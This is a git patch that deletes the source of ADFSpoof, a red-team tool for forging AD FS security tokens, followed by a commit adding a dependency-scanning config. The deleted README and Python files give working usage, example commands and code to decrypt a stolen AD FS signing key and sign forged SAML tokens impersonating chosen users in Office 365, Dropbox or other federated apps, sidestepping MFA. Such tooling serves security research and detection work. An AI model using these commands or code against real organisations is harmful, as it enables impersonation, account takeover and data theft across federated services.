may not use this file except in compliance with the License. - You may obtain a copy of the License at - - http://www.apache.org/licenses/LICENSE-2.0 - - Unless required by applicable law or agreed to in writing, software - distributed under the License is distributed on an "AS IS" BASIS, - WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - See the License for the specific language governing permissions and - limitations under the License. diff --git a/README.md b/README.md deleted file mode 100644 index aa03754..0000000 --- a/README.md +++ /dev/null @@ -1,139 +0,0 @@ -# ADFSpoof - -A python tool to forge AD FS security tokens. - -Created by Doug Bienstock [(@doughsec)](https://twitter.com/doughsec) while at Mandiant FireEye. - -## Detailed Description - -ADFSpoof has two main functions: -1. Given the EncryptedPFX blob from the AD FS configuration database and DKM decryption key from Active Directory, produce a usable key/cert pair for token signing. -2. Given a signing key, produce a signed security token that can be used to access a federated application. - -This tool is meant to be used in conjunction with ADFSDump. ADFSDump runs on an AD FS server and outputs important information that you will need to use ADFSpoof. - -If you are confused by the above, you might want to read up on AD FS first. For more information on AD FS spoofing I will post a link to my TROOPERS 19 talk and slides when they are released. - -## Installation - -ADFSpoof is written in Python 3. - -~~ADFSpoof requires the installation of a custom fork of the Python Cryptography package, available [here](https://github.com/dmb2168/cryptography). Microsoft did not exactly follow the RFC for Key Deriviation :wink:, so a fork of the package was needed.~~ The modified key derivation function has been ported to work with the newer versions of cryptography lib. - -All requirements are captured in the repo's requirements.txt. - -`pip install -r requirements.txt` - -## Usage - -``` -usage: ADFSpoof.py [-h] (-b BLOB BLOB | -c CERT) [-p PASSWORD] [-v VERBOSE] - [--assertionid ASSERTIONID] [--responseid RESPONSEID] - [-s SERVER] [-a ALGORITHM] [-d DIGEST] [-o OUTPUT] - {o365,dropbox,saml2,dump} ... - -optional arguments: - -h, --help show this help message and exit - -b BLOB BLOB, --blob BLOB BLOB - Encrypted PFX blob and decryption key - -c CERT, --cert CERT AD FS Signing Certificate - -p PASSWORD, --password PASSWORD - AD FS Signing Certificate Password - -v VERBOSE, --verbose VERBOSE - Verbose Output - --assertionid ASSERTIONID - AssertionID string. Defaults to a random string - --responseid RESPONSEID - The Response ID. Defaults to random string - -s SERVER, --server SERVER - Identifier for the federation service. Usually the - fqdn of the server. e.g. sts.example.com DO NOT - include HTTPS:// - -a ALGORITHM, --algorithm ALGORITHM - SAML signing algorithm to use - -d DIGEST, --digest DIGEST - SAML digest algorithm to use - -o OUTPUT, --output OUTPUT - Write generated token to the supplied filepath - -modules: - loaded modules - - {o365,dropbox,saml2,dump} - additional help -``` -### Cryptographic Material - -All ADFSpoof functionality requires cryptographic material for the AD FS signing key. This can be supplied in one of two ways: - -* `-b BLOB BLOB`: Supply the EncryptedPFX binary blob (base64 decode what is pulled out of the configuration database) and the DKM key from Active directory. Order matters! -* `-c CERT`: Provide a PKCS12-formatted file for the signing key and certificate. If it is password protected supply a password with `-p`. The overall file password and private key password must be the same. - - -### Global Options - -* `-s SERVER`: The AD FS service identifier. Required when using any module that generates a security token. This goes into the security token to let the federated application know who generated it. -* `-o FILEPATH`: Outputs the generated token to disk instead of printing it. -* `--assertionid` and `--responseid`: If you wish to supply custom attribute values for SAML AssertionID and ResponseID. Defaults to random strings. -* `-d DIGEST`: Set the MAC digest algorithm. Defaults to SHA256. -* `-a ALGORITHM`: Set the signature algorithm. Defaults to RSA-SHA256. - - -### Command Modules - -ADFSpoof is built modularly with easy expansion in mind. Currently, it comes preloaded with four command modules that support different functionality. - -Each module encapsulates the SAML attributes and values necessary to generate a valid security token for a specific token type or federated application. *Note that for the applications specific modules, the template represents the generic installation. Customization may be required for organizations that have messed with the defaults.* - -#### o365 - -Generates a forged security token to access Microsoft Office 365. This is a SAML 1.1 token. - -* `--upn UPN`: The universal principal name of the user to generate a token for. Get this from AD. -* `--objectguid`: The Object GUID of the user to generate a token for. Get this from AD. Include the curly braces. - -#### Dropbox - -Generats a forged security token to access Dropbox. This is a SAML 2.0 token. - -* `--email EMAIL`: The email address of the user to generate a token for. -* `--accountname ACCOUNT`: The SamAccountName of the user to generate a token for. - -#### SAML2 - -A command that encapsulates generating a generic SAML 2.0 security token. Use this module to generate security tokens for arbitrary federated applications that are using SAML 2.0. By reading the data returned by ADFSDump you should be able to generate a valid token for just about any federated application using this module. - -* `--endpoint ENDPOINT`: The recipient of the seucrity token. This should be a full URL. -* `--nameidformat URN`: The value for the 'Format' attribute of the NameIdentifier tag. This should be a URN. -* `--nameid NAMEID`: The NameIdentifier attribute value. -* `--rpidentifier IDENTIFIER`: The Identifier of the relying party that is receiving the token. -* `--assertions ASSERTIONS`: The assertions that the relying party is expecting. Use the claim rules output by ADFSDump to ascertain this. Should be a single-line (do not include newlines) XML string. -* `--config FILEPATH`: A filepath to a JSON file containing the above arguments. Optional - use this if you don't want to supply everything over the command line. - -#### Dump - -Helper command that will take the supplied EncryptedPFX blob and DKM key from `-b`, decrypt the blob, and output the PFX file to disk. Use this to save the PFX for later. - -`--path PATH`: The filepath to save the generated PFX. - -### Examples - -#### Decrypt the EncryptedPFX and write to disk -`python ADFSpoof.py -b EncryptedPfx.bin DKMkey.bin dump` - -#### Generate a security token for Office365 - -`python ADFSpoof.py -b EncryptedPfx.bin DkmKey.bin -s sts.doughcorp.com o365 --upn robin@doughcorp.co --objectguid {1C1D4BA4-B513-XXX-XXX-3308B907D759}` - -#### Generate a SAML 2.0 token for some app - -`python ADFSpoof.py -b EncryptedPfx.bin DkmKey.bin -s sts.doughcorp.com saml2 --endpoint https://my.app.com/access/saml --nameidformat urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress --nameid robin@doughcorp.com --rpidentifier myapp --assertions robin@doughcorp.com` - -### Reading Issuance Authorization Rules - -More coming soon! As a tl;dr for SAML 2.0 each issuance rule (with the exception of the nameid rule) is going to be translated into a SAML assertion. SAML assertions are tags. The Attribute tag must have an attribute called "Name" that value of which is the claim type. The claim value goes inside the tags. - - There is a little more nuance which I hope to discuss in a wiki page soon, but that is the basic idea. Relying Parties may have "StrongAuth" rules and MFA requirements, but usually we don't care about those. - - - diff --git a/SamlSigner.py b/SamlSigner.py deleted file mode 100644 index 2b50237..0000000 --- a/SamlSigner.py +++ /dev/null @@ -1,26 +0,0 @@ -from cryptography.hazmat.primitives.serialization import pkcs12 -import string -from lxml import etree -from signxml import XMLSigner -from cryptography.hazmat.backends import default_backend -import re - - -class SAMLSigner(): - def __init__(self, data, template=None, password=None): - self.key, self.cert = self.load_pkcs12(data, password) - with open("templates/{0}.xml".format(template), 'r') as infile: - self.saml_template = infile.read() - - def load_pkcs12(self, data, password): - cert = pkcs12.load_key_and_certificates(data, password, default_backend()) - return cert[0], cert[1] - - def sign_XML(self, params, id_attribute, algorithm, digest): - saml_string = string.Template(self.saml_template).substitute(params) - data = etree.fromstring(saml_string) - - signed_xml = XMLSigner(c14n_algorithm="http://www.w3.org/2001/10/xml-exc-c14n#", signature_algorithm=algorithm, digest_algorithm=digest).sign(data, key=self.key, cert=[self.cert], reference_uri=params.get('AssertionID'), id_attribute=id_attribute) - signed_saml_string = etree.tostring(signed_xml).replace(b'\n', b'') - signed_saml_string = re.sub(b'-----(BEGIN|END) CERTIFICATE-----', b'', signed_saml_string) - return signed_saml_string diff --git a/microsoft_kbkdf.py b/microsoft_kbkdf.py deleted file mode 100644 index d320cbc..0000000 --- a/microsoft_kbkdf.py +++ /dev/null @@ -1,138 +0,0 @@ -# This file is dual licensed under the terms of the Apache License, Version -# 2.0, and the BSD License. See the LICENSE file in the root of this repository -# for complete details. - -from __future__ import absolute_import, division, print_function - -from enum import Enum - -from six.moves import range - -from cryptography import utils -from cryptography.exceptions import ( - AlreadyFinalized, InvalidKey, UnsupportedAlgorithm, _Reasons -) -from cryptography.hazmat.primitives import constant_time, hashes, hmac -from cryptography.hazmat.primitives.kdf import KeyDerivationFunction - - -class Mode(Enum): - CounterMode = "ctr" - - -class CounterLocation(Enum): - BeforeFixed = "before_fixed" - AfterFixed = "after_fixed" - - -@utils.register_interface(KeyDerivationFunction) -class KBKDFHMAC(object): - def __init__(self, algorithm, mode, length, rlen, llen, - location, label, context, fixed, backend): - if not isinstance(algorithm, hashes.HashAlgorithm): - raise UnsupportedAlgorithm( - "Algorithm supplied is not a supported hash algorithm.", - _Reasons.UNSUPPORTED_HASH - ) - - if not backend.hmac_supported(algorithm): - raise UnsupportedAlgorithm( - "Algorithm supplied is not a supported hmac algorithm.", - _Reasons.UNSUPPORTED_HASH - ) - - if not isinstance(mode, Mode): - raise TypeError("mode must be of type Mode") - - if not isinstance(location, CounterLocation): - raise TypeError("location must be of type CounterLocation") - - if (label or context) and fixed: - raise ValueError("When supplying fixed data, " - "label and context are ignored.") - - if rlen is None or not self._valid_byte_length(rlen): - raise ValueError("rlen must be between 1 and 4") - - if llen is None and fixed is None: - raise ValueError("Please specify an llen") - - if llen is not None and not isinstance(llen, int): - raise TypeError("llen must be an integer") - - if label is None: - label = b'' - - if context is None: - context = b'' - - utils._check_bytes("label", label) - utils._check_bytes("context", context) - self._algorithm = algorithm - self._mode = mode - self._length = length - self._rlen = rlen - self._llen = llen - self._location = location - self._label = label - self._context = context - self._backend = backend - self._used = False - self._fixed_data = fixed - - def _valid_byte_length(self, value): - if not isinstance(value, int): - raise TypeError('value must be of type int') - - value_bin = utils.int_to_bytes(1, value) - if not 1 <= len(value_bin) <= 4: - return False - return True - - def derive(self, key_material): - if self._used: - raise AlreadyFinalized - - utils._check_byteslike("key_material", key_material) - self._used = True - - # inverse floor division (equivalent to ceiling) - rounds = -(-self._length // self._algorithm.digest_size) - - output = [b''] - - # For counter mode, the number of iterations shall not be - # larger than 2^r-1, where r <= 32 is the binary length of the counter - # This ensures that the counter values used as an input to the - # PRF will not repeat during a particular call to the KDF function. - r_bin = utils.int_to_bytes(1, self._rlen) - if rounds > pow(2, len(r_bin) * 8) - 1: - raise ValueError('There are too many iterations.') - - for i in range(1, rounds + 1): - h = hmac.HMAC(key_material, self._algorithm, backend=self._backend) - - counter = utils.int_to_bytes(i, self._rlen) - if self._location == CounterLocation.BeforeFixed: - h.update(counter) - - h.update(self._generate_fixed_input()) - - if self._location == CounterLocation.AfterFixed: - h.update(counter) - - output.append(h.finalize()) - - return b''.join(output)[:self._length] - - def _generate_fixed_input(self): - if self._fixed_data and isinstance(self._fixed_data, bytes): - return self._fixed_data - - l_val = utils.int_to_bytes(self._length, self._llen) - - return b"".join([self._label, b"\x00", self._context, l_val]) - - def verify(self, key_material, expected_key): - if not constant_time.bytes_eq(self.derive(key_material), expected_key): - raise InvalidKey \ No newline at end of file diff --git a/project.json b/project.json deleted file mode 100644 index 8131238..0000000 --- a/project.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "name": "repo-repos-adfspoof", - "root": "repos/ADFSpoof", - "projectType": "library", - "targets": { - "status": { - "executor": "nx:run-commands", - "options": { - "command": "git -C repos/ADFSpoof status --short || true" - }, - "metadata": { - "supervisorRequired": true - } - }, - "fetch": { - "executor": "nx:run-commands", - "options": { - "command": "git -C repos/ADFSpoof fetch --all --prune || true" - }, - "metadata": { - "supervisorRequired": true - } - }, - "log": { - "executor": "nx:run-commands", - "options": { - "command": "git -C repos/ADFSpoof log --oneline -10 || true" - }, - "metadata": { - "supervisorRequired": true - } - }, - "manifests": { - "executor": "nx:run-commands", - "options": { - "command": "find repos/ADFSpoof \\( -name package.json -o -name pyproject.toml -o -name Cargo.toml -o -name go.mod -o -name setup.py \\) -not -path '*/node_modules/*' -not -path '*/testdata/*' -not -path '*/fixtures/*' -print | sort" - }, - "metadata": { - "supervisorRequired": true - } - } - }, - "tags": [ - "scope:repos", - "type:subrepo" - ] -} \ No newline at end of file diff --git a/requirements.txt b/requirements.txt deleted file mode 100644 index 50039b0..0000000 --- a/requirements.txt +++ /dev/null @@ -1,13 +0,0 @@ -asn1crypto==1.5.1 -certifi==2026.2.25 -cffi==2.0.0 -cryptography==46.0.5 -defusedxml==0.7.1 -eight==1.0.1 -future==1.0.0 -lxml==6.0.2 -pyasn1==0.6.3 -pyOpenSSL==26.0.0 -pycparser==3.0 -signxml==4.4.0 -six==1.17.0 diff --git a/templates/dropbox.xml b/templates/dropbox.xml deleted file mode 100644 index 9204b58..0000000 --- a/templates/dropbox.xml +++ /dev/null @@ -1 +0,0 @@ -http://$AdfsServer/adfs/services/trusthttp://$AdfsServer/adfs/services/trust$EmailAddressDropbox$EmailAddressrobinurn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport \ No newline at end of file diff --git a/templates/o365.xml b/templates/o365.xml deleted file mode 100644 index b175e0f..0000000 --- a/templates/o365.xml +++ /dev/null @@ -1 +0,0 @@ -$TokenCreated$TokenExpiresurn:federation:MicrosoftOnlineurn:federation:MicrosoftOnline$NameIdentifierurn:oasis:names:tc:SAML:1.0:cm:bearer$UPN$NameIdentifierfalseurn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport$NameIdentifierurn:oasis:names:tc:SAML:1.0:cm:bearerurn:oasis:names:tc:SAML:1.0:assertionhttp://schemas.xmlsoap.org/ws/2005/02/trust/Issuehttp://schemas.xmlsoap.org/ws/2005/05/identity/NoProofKey diff --git a/templates/saml2.xml b/templates/saml2.xml deleted file mode 100644 index 263daab..0000000 --- a/templates/saml2.xml +++ /dev/null @@ -1 +0,0 @@ -http://$AdfsServer/adfs/services/trusthttp://$AdfsServer/adfs/services/trust$NameID$RPIdentifier$Assertionsurn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport \ No newline at end of file diff --git a/utils.py b/utils.py deleted file mode 100644 index 66dd843..0000000 --- a/utils.py +++ /dev/null @@ -1,49 +0,0 @@ -import random -import string -import sys -import base64 - - -def random_string(): - return '_' + ''.join(random.choices(string.ascii_uppercase + string.digits, k=6)) - - -def new_guid(stream): - guid = [] - guid.append(stream[3] << 24 | stream[2] << 16 | stream[1] << 8 | stream[0]) - guid.append(stream[5] << 8 | stream[4]) - guid.append(stream[7] << 8 | stream[6]) - guid.append(stream[8]) - guid.append(stream[9]) - guid.append(stream[10]) - guid.append(stream[11]) - guid.append(stream[12]) - guid.append(stream[13]) - guid.append(stream[14]) - guid.append(stream[15]) - return guid - - -def encode_object_guid(guid): - guid = guid.replace('}', '').replace('{', '') - guid_parts = guid.split('-') - hex_string = guid_parts[0][6:] + guid_parts[0][4:6] + guid_parts[0][2:4] + guid_parts[0][0:2] + guid_parts[1][2:] + guid_parts[1][0:2] + guid_parts[2][2:] + guid_parts[2][0:2] + guid_parts[3] + guid_parts[4] - hex_array = bytearray.fromhex(hex_string) - immutable_id = base64.b64encode(hex_array) - return immutable_id - - -def die(): - sys.exit() - - -def print_intro(): - - print(' ___ ____ ___________ ____') - print(' / | / __ \/ ____/ ___/____ ____ ____ / __/') - print(' / /| | / / / / /_ \__ \/ __ \/ __ \/ __ \/ /_ ') - print(' / ___ |/ /_/ / __/ ___/ / /_/ / /_/ / /_/ / __/ ') - print('/_/ |_/_____/_/ /____/ .___/\____/\____/_/ ') - print(' /_/ \n') - print('A tool to for AD FS security tokens') - print('Created by @doughsec\n') From 2d1d7d8754061374bc556477d4616e73ea005659 Mon Sep 17 00:00:00 2001 From: "mend-bolt-for-github[bot]" <42819689+mend-bolt-for-github[bot]@users.noreply.github.com> Date: Wed, 8 Apr 2026 01:31:05 +0000 Subject: [PATCH 106/106] Add .whitesource configuration file --- .whitesource | 14 ++++++++++++++ 1 file changed, 14 insertions(+) create mode 100644 .whitesource diff --git a/.whitesource b/.whitesource new file mode 100644 index 0000000..9c7ae90 --- /dev/null +++ b/.whitesource @@ -0,0 +1,14 @@ +{ + "scanSettings": { + "baseBranches": [] + }, + "checkRunSettings": { + "vulnerableCheckRunConclusionLevel": "failure", + "displayMode": "diff", + "useMendCheckNames": true + }, + "issueSettings": { + "minSeverityLevel": "LOW", + "issueType": "DEPENDENCY" + } +} \ No newline at end of file